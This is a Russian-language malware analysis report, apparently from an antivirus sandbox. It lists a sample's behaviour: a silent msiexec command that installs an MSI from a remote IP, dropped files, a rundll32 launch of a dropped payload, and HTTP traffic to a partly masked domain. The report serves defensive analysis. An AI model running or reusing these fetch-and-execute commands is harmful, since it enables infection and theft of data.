Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\msiexec.exe' back=13 error=continue /i http://18#.#7.122.220/555.msi /q OnLoad="%WINDIR%\notepad.exe"
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\microsoft\forms\winword.box
- %TEMP%\rjmrssmzdd872hrjmrssmzdd.dat
Сетевая активность
Подключается к
- 'no###tored.com':80
TCP
Запросы HTTP GET
- http://18#.#7.122.220/555.msi
Запросы HTTP POST
- http://no###tored.com/docs/saz.php
UDP
- DNS ASK no###tored.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\installer\msi4.tmp'
- '<SYSTEM32>\msiexec.exe' back=13 error=continue /i http://18#.#7.122.220/555.msi /q OnLoad="%WINDIR%\notepad.exe"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C echo %logonserver%' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\rundll32.exe' %TEMP%\RJMRSSMZDD872hRJMRSSMZDD.dat, JHOQMXPL
- '<SYSTEM32>\cmd.exe' /C echo %logonserver%
